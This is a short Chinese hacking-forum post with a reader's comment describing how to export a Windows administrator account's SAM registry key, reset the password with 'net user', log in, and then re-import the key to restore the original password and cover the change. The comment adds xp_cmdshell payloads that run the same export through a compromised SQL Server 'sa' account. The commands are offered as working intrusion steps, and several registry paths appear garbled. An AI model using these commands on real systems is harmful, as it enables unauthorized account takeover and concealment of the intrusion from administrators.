导出管理员密码文件
来源:红狼
sa默认可以读sam键.应该。
reg export HKLMSAMSAMDomainsAccountUsers�00001F4 c:old.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:old.reg
根本不用克隆.
找到对应的sid.
/*不狐:这则经验非常不错,前面我做过一次渗透就没想到可以这样来!
默认情况下sa继承system权限,对sam键值有完全控制权限。
SQL代码
exec master..xp_cmdshell "reg export HKLMSAMSAMDomainsAccountUsers�00001F4 c:old.reg"--
或者
SQL代码
exec master..xp_cmdshell "regedit -e C:1.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers�00001F4"--
都是可行的。
- 上一篇:黑客盗取网站80万点卡获刑13年
- 下一篇:两个简易VBS脚本结束进程与防止进程启动
相关文章
图文推荐
-
在CentOS6.x下安装Compiz——桌面立方体,特效种种
-
利用U盘安装windows7
-
sqlserver查询数据可编辑方法
-
Android RoboGuice使用指南(7):@Provides Methods
- 文章
- 推荐
- 热门新闻